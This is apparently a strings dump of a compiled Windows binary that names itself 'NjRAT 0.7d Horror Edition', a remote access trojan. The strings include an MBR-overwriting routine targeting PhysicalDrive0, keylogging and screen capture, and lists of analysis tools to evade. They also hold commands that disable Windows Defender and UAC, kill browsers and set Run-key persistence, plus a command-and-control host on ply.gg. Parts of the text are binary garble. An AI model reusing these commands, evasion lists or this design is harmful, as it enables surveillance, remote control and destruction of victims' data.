!This program cannot be run in DOS mode.
`.rsrc
@.reloc
As you reboot, you find that your MBR has been overwritten.
Game Over.
U fV;q
sI"\;v
]OEi;
3|sF
v2.0.50727
#Strings
<Module>
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
System.CodeDom.Compiler
GeneratedCodeAttribute
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
Microsoft.VisualBasic.Devices
Computer
System.Diagnostics
DebuggerHiddenAttribute
System
Object
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
Microsoft.VisualBasic
HideModuleNameAttribute
MyGroupCollectionAttribute
RuntimeHelpers
GetObjectValue
Equals
GetHashCode
RuntimeTypeHandle
GetTypeFromHandle
ToString
Activator
CreateInstance
System.Runtime.InteropServices
ComVisibleAttribute
CompilerGeneratedAttribute
ThreadStaticAttribute
m_ThreadStaticValue
get_GetInstance
System.ComponentModel.Design
HelpKeywordAttribute
System.Timers
ElapsedEventArgs
Process
GetProcessesByName
ProjectData
EndApp
ElapsedEventHandler
add_Elapsed
set_Enabled
ClearProjectError
RuntimeFieldHandle
InitializeArray
IntPtr
Exception
SetProjectError
CreateProjectError
Operators
CompareString
MulticastDelegate
IAsyncResult
AsyncCallback
System.Collections.Generic
List`1
System.Text
StringBuilder
op_Explicit
System.Threading
Thread
NewLateBinding
LateGet
ConditionalCompareObjectEqual
Conversions
ToInteger
get_Capacity
GetProcessById
get_ProcessName
String
ToLower
Strings
Remove
get_Count
get_Item
Monitor
ToArray
Random
System.Net.Sockets
TcpClient
System.IO
FileStream
FileInfo
MemoryStream
ToBoolean
System.Reflection
Assembly
GetEntryAssembly
get_Location
ThreadStart
DebuggerStepThroughAttribute
Microsoft.Win32
SessionEndingEventArgs
System.Drawing
Rectangle
System.Windows.Forms
Screen
get_PrimaryScreen
get_Bounds
get_Width
get_Height
Cursor
set_Position
SolidBrush
StringFormat
Graphics
FromHwnd
get_Red
StringFormatFlags
set_FormatFlags
Boolean
LateCall
ChangeType
IDisposable
Dispose
op_Equality
get_Length
Encoding
get_UTF8
GetString
DirectoryInfo
get_Name
get_Directory
get_Parent
System.Net
WebClient
DownloadString
Stream
set_ReceiveBufferSize
set_SendBufferSize
Socket
get_Client
set_SendTimeout
set_ReceiveTimeout
Connect
Concat
Convert
FromBase64String
Microsoft.VisualBasic.MyServices
RegistryProxy
ServerComputer
get_Registry
RegistryKey
get_CurrentUser
OpenSubKey
DeleteValue
ToBase64String
System.Collections
IEnumerator
Interaction
GetObject
IEnumerable
GetEnumerator
get_Current
MoveNext
GetValue
Environ
Conversion
Bitmap
CompareMethod
CreateObject
Clipboard
SetText
MsgBoxResult
MsgBoxStyle
MsgBox
RegistryValueKind
ConcatenateObject
get_Chars
DownloadData
VBMath
Randomize
GetTempPath
NewGuid
Replace
WriteAllBytes
get_Message
LateSet
CompareObjectEqual
OrObject
System.Drawing.Imaging
PixelFormat
FromImage
CopyPixelOperation
CopyFromScreen
get_Position
Cursors
get_Default
DrawImage
ImageFormat
get_Jpeg
WriteByte
FileSystemInfo
get_FullName
AppWinStyle
Exists
Create
Delete
ReadAllText
ProcessStartInfo
set_UseShellExecute
Application
get_ExecutablePath
GetFileName
set_FileName
AppDomain
get_CurrentDomain
get_BaseDirectory
set_WorkingDirectory
set_Verb
Contains
DateTime
Environment
get_MachineName
get_UserName
get_LastWriteTime
get_Date
ComputerInfo
get_Info
get_OSFullName
OperatingSystem
get_OSVersion
get_ServicePack
SpecialFolder
GetFolderPath
RegistryKeyPermissionCheck
CreateSubKey
GetValueNames
FileMode
ReadAllBytes
EnvironmentVariableTarget
SetEnvironmentVariable
SetValue
get_LocalMachine
FileSystemProxy
get_FileSystem
SpecialDirectoriesProxy
get_SpecialDirectories
get_ProgramFiles
Directory
GetLogicalDrives
GetExecutingAssembly
Command
SessionEndingEventHandler
SystemEvents
add_SessionEnding
DoEvents
GetCurrentProcess
set_MinWorkingSet
ConditionalCompareObjectNotEqual
System.Security.Cryptography
MD5CryptoServiceProvider
HashAlgorithm
ComputeHash
Module
GetModules
GetTypes
EndsWith
get_Assembly
get_Handle
get_Available
SelectMode
NetworkStream
GetStream
ReadByte
ToLong
SocketFlags
Receive
ParameterizedThreadStart
GetBytes
DeleteSubKey
System.IO.Compression
GZipStream
CompressionMode
BitConverter
ToInt32
get_MainWindowTitle
DateAndTime
get_Now
Keyboard
get_Keyboard
get_ShiftKeyDown
get_CapsLock
ToUpper
get_CtrlKeyDown
STAThreadAttribute
ValueType
Stub.exe
kernel32
user32.dll
user32
avicap32.dll
winmm.dll
gdi32.dll
KERNEL32.DLL
mscorlib
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
MyAntiProcess
MBRSlayer
<PrivateImplementationDetails>
__StaticArrayInitTypeSize=512
AntiTaskManager
EnumWindProc
EnumChildWindProc
GetWindow_Cmd
TernaryRasterOperations
__StaticArrayInitTypeSize=6
m_ComputerObjectProvider
m_AppObjectProvider
m_UserObjectProvider
m_MyWebServicesObjectProvider
.cctor
get_Computer
get_Application
get_User
get_WebServices
GetType
Create__Instance__
instance
Dispose__Instance__
Handler
sender
MouseThread
CrazyThread
bThread
WM_COMMAND
SRCCOPY
Anti_CH
USB_SP
lastcap
MSGSYM
KAKASHI
AKATSUKI
CLEANSWEEP
PASTEE
PASTEBIN
nowifi
_Lambda__1
_Lambda__2
oldValue
newValue
HorrorText
BlockInput
fBlockIt
capGetDriverDescriptionA
wDriver
lpszName
cbName
lpszVer
CompDir
connect
GetForegroundWindow
GetVolumeInformation
GetVolumeInformationA
lpRootPathName
lpVolumeNameBuffer
nVolumeNameSize
lpVolumeSerialNumber
lpMaximumComponentLength
lpFileSystemFlags
lpFileSystemNameBuffer
nFileSystemNameSize
GetWindowText
GetWindowTextA
WinTitle
MaxLength
GetAntiVirus
GetWindowTextLength
GetWindowTextLengthA
GetWindow
SendMessage
wParam
lParam
ToggleDesktopIcons
FindWindow
lpClassName
lpWindowName
ShowWindow
nCmdShow
mciSendString
command
buffer
bufferSize
hwndCallback
ReleaseDC
CreateSolidBrush
crColor
PatBlt
nXLeft
nYLeft
nWidth
nHeight
BitBlt
hdcDest
nXDest
nYDest
hdcSrc
StretchBlt
nXOriginDest
nYOriginDest
nWidthDest
nHeightDest
nXOriginSrc
nYOriginSrc
nWidthSrc
nHeightSrc
GetDesktopWindow
GetWindowDC
SelectObject
hgdiobj
DeleteObject
objectHandle
NtSetInformationProcess
hProcess
processInformationClass
processInformation
processInformationLength
Plugin
GenericWrite
GenericExecute
GenericAll
FileShareRead
FileShareWrite
OpenExisting
FileFlagDeleteOnClose
MbrSize
CreateFile
lpFileName
dwDesiredAccess
dwShareMode
lpSecurityAttributes
dwCreationDisposition
dwFlagsAndAttributes
hTemplateFile
WriteFile
lpBuffer
nNumberOfBytesToWrite
lpNumberBytesWritten
lpOverlapped
03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8
462E13B612D5A6C3EC8AB25DF69755AD20BF51EF
ComputeStringHash
xTimer
EnableWindow
bEnable
GetWindowThreadProcessId
lpdwProcessID
GetClassName
GetClassNameA
nMaxCount
SendMessageA
lpString
EnumChildWindows
lpEnumFunc
EnumChild
protect
GetChild
TargetObject
TargetMethod
BeginInvoke
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
Invoke
value__
Normal
ShowMinimized
ShowMaximized
ShowNoActivate
Minimize
ShowMinNoActive
ShowNA
Restore
ShowDefault
ForceMinimize
GW_HWNDFIRST
GW_HWNDLAST
GW_HWNDNEXT
GW_HWNDPREV
GW_OWNER
GW_CHILD
GW_ENABLEDPOPUP
SRCPAINT
SRCAND
SRCINVERT
SRCERASE
NOTSRCCOPY
NOTSRCERASE
MERGECOPY
MERGEPAINT
PATCOPY
PATPAINT
PATINVERT
DSTINVERT
BLACKNESS
WHITENESS
LastAS
LastAV
lastKey
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardState
MapVirtualKey
ToUnicodeEx
VKCodeToUnicode
WebServices
GetInstance
zg+QL^
MyTemplate
11.0.0.0
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
My.Computer
My.Application
My.User
My.WebServices
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
7JU]dkr
procexp
SbieCtrl
SpyTheSpy
wireshark
apateDNS
IPBlocker
TiGeR-Firewall
smsniff
exeinfoPE
NetSnifferCs
Sandboxie Control
processhacker
CodeReflect
Reflector
VGAuthService
VBoxService
\\.\PhysicalDrive0
taskmgr
Chrome
Firefox
Chromium
OperaGX
MSEdge
Safari
Iridium
Dissenter
PaleMoon
Vivaldi
iExplore
ToInt32
process explorer
button
static
directuihwnd
AppData
svchost.exe
away-displays.gl.at.ply.gg
a7f21f6241b3a13bae51122d4afa0197
Software\Microsoft\Windows\CurrentVersion\Run
<- NjRAT 0.7d Horror Edition ->
Y262SUCZ4UJJ
Disabled
Themida
Sorry, this application cannot run under a Virtual Machine
vbCritical
Wireshark.exe
https://pastebin.com/raw/???
Palemoon
MsEdge
Slimbrowser
OperaMini
Time to format
I am in your Computer
Erasing files
Your system is now mine
DrawString
Enabled
Software\
Select * From AntiVirusProduct
winmgmts:\\.\root\SecurityCenter2
ExecQuery
displayName
Progman
Program Manager
SystemDrive
message
SAPI.spvoice
getvalue
Execute ERROR
Download ERROR
Executed As
Execute ERROR
hideico
showico
TogDesk
dolock
unlock
mirror
Invert
Flashbang
LightsOut
HClock
SClock
HStart
SStart
nbrowse
fbrowse
newmouse
insane
getlog
rainbowz
feitan
FuckMBR
FuckMBRNR
AdmChk
FckOffShutdown
btnMCs
btnMDs
btnMFs
btnMGs
btnMAs
btnHCs
btnHDs
btnHFs
btnHGs
btnHAs
btnLAs
btnLGs
btnLFs
btnLDs
btnLCs
cmd /c start shutdown /s /f /t 0
cmd /c start shutdown /r /f /t 0
cmd /c start shutdown /l /f
Shell_TrayWnd
set CDAudio door open
set CDAudio door closed
select.dat
victim already in locked mode
victim now locked
unlocke victim
victim was not locked, you need lock first
Settings
Window
Task Host Window
DWM Notification Window
BluetoothNotificationAreaIconWindowClass
CiceroUIWndFrame
Temp Window
Default IME
MSCTFIME UI
DDE Server Window
MediaContextNotificationWIndow
MS_WebcheckMonitor
Windows Push Notifications Platform
cmd /c taskkill /f /im Chrome.exe
cmd /c taskkill /f /im Firefox.exe
cmd /c taskkill /f /im Chromium.exe
cmd /c taskkill /f /im Opera.exe
cmd /c taskkill /f /im OperaGX.exe
cmd /c taskkill /f /im MsEdge.exe
cmd /c taskkill /f /im Safari.exe
cmd /c taskkill /f /im Brave.exe
cmd /c taskkill /f /im Iridium.exe
cmd /c taskkill /f /im Dissenter.exe
cmd /c taskkill /f /im PaleMoon.exe
cmd /c taskkill /f /im Vivaldi.exe
cmd /c taskkill /f /im iExplore.exe
cmd /c shutdown /s /f /t 60
clip.txt
Error occured trying to get logs. possible error log file not exists, try grabbing the clipboard first.
cmd /c rundll32.exe user32.dll,LockWorkStation
taskkill /f /im
UAC Fail, WTF?:
schtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr
schtasks /delete /tn CleanSweepCheck /f
C: //test.txt
AdminCheck: MBR Overwritten.
MBR Overwritten, successfully.
cmd /c start shutdown /r /f /t 3
C://test.txt
denied
AdminCheck: Can't use MBR. (No admin)
Cannot overwrite MBR, needs Admin privilege
AdminCheck: You have admin rights.
AdminCheck: You have no admin rights.
cmd /c shutdown -a
Update ERROR
Updating To
Update ERROR
yy-MM-dd
??-??-??
Microsoft
Windows
Yeah >:)
Nope >:(
SEE_MASK_NOZONECHECKS
attrib +h "
obito.txt
vbInformation
vbExclamation
vbQuestion
cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
cmd /c sc query windefend
cmd /c sc stop windefend
cmd /c sc delete windefend
cmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmd /c taskkill /f /im
ClickMe.exe
Software
cmd.exe /c ping 0 -n 2 & del "
yy/MM/dd
[ENTER]